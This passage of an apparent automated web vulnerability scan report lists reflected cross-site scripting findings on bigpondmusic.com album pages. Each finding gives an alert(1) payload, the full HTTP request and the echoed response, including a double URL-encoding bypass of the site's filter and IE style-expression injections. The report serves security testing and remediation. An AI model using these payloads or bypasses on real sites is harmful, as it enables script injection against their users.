The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8 was submitted in the REST URL parameter 1. This input was echoed as 9aa2b"><script>alert(1)</script>40c385453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8/rascal-flatts/nothing-like-this HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88467


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9aa2b"><script>alert(1)</script>40c385453a8/rascal-flatts/nothing-like-this" />
...[SNIP]...

2.127. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab7f7'%3b75a2a29d0bb was submitted in the REST URL parameter 1. This input was echoed as ab7f7';75a2a29d0bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumab7f7'%3b75a2a29d0bb/rascal-flatts/nothing-like-this HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87847


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumab7f7';75a2a29d0bb';
   s.prop4 = 'rascal-flatts';
   s.prop5 = 'nothing-like-this';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s
...[SNIP]...

2.128. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce was submitted in the h parameter. This input was echoed as 69564"style="x:expression(alert(1))"a3c04abb6ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rascal-flatts/nothing-like-this?h=76868968769564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 121041


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rascal Flatts - Nothing Like
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rascal-flatts/nothing-like-this?h=76868968769564"style="x:expression(alert(1))"a3c04abb6ce" />
...[SNIP]...

2.129. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rascal-flatts/nothing-like-this

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb486"style="x:expression(alert(1))"1f6f0212f93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rascal-flatts/nothing-like-this?fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 121111


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rascal Flatts - Nothing Like
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rascal-flatts/nothing-like-this?fb486"style="x:expression(alert(1))"1f6f0212f93=1" />
...[SNIP]...

2.130. http://bigpondmusic.com/album/rihanna/loud6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369 was submitted in the REST URL parameter 1. This input was echoed as c8e4f"><script>alert(1)</script>35d45e20369 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369/rihanna/loud6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc8e4f"><script>alert(1)</script>35d45e20369/rihanna/loud6" />
...[SNIP]...

2.131. http://bigpondmusic.com/album/rihanna/loud6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8987c'%3b2e62406d5a3 was submitted in the REST URL parameter 1. This input was echoed as 8987c';2e62406d5a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album8987c'%3b2e62406d5a3/rihanna/loud6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87974


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album8987c';2e62406d5a3';
   s.prop4 = 'rihanna';
   s.prop5 = 'loud6';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.c
...[SNIP]...

2.132. http://bigpondmusic.com/album/rihanna/loud6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4eb56"style="x:expression(alert(1))"b49ea62020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/loud6?4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 117450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Loud - BigPond Mus
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/loud6?4eb56"style="x:expression(alert(1))"b49ea62020f=1" />
...[SNIP]...

2.133. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac was submitted in the REST URL parameter 1. This input was echoed as 16411"><script>alert(1)</script>6c9e03e38ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac/rihanna/only-girl-in-the-world HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album16411"><script>alert(1)</script>6c9e03e38ac/rihanna/only-girl-in-the-world" />
...[SNIP]...

2.134. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae660'%3b66a4ff2fd7f was submitted in the REST URL parameter 1. This input was echoed as ae660';66a4ff2fd7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumae660'%3b66a4ff2fd7f/rihanna/only-girl-in-the-world HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumae660';66a4ff2fd7f';
   s.prop4 = 'rihanna';
   s.prop5 = 'only-girl-in-the-world';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.
...[SNIP]...

2.135. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77629"style%3d"x%3aexpression(alert(1))"90366360b68 was submitted in the h parameter. This input was echoed as 77629"style="x:expression(alert(1))"90366360b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/only-girl-in-the-world?h=73335586477629"style%3d"x%3aexpression(alert(1))"90366360b68 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Only Girl (In The
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?h=73335586477629"style="x:expression(alert(1))"90366360b68" />
...[SNIP]...

2.136. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c081b"style="x:expression(alert(1))"d068e88c9dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/only-girl-in-the-world?c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103894


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Only Girl (In The
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?c081b"style="x:expression(alert(1))"d068e88c9dc=1" />
...[SNIP]...

2.137. http://bigpondmusic.com/album/susan-boyle/the-gift11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c46a2'%3b0a91471649d was submitted in the REST URL parameter 1. This input was echoed as c46a2';0a91471649d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc46a2'%3b0a91471649d/susan-boyle/the-gift11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88329


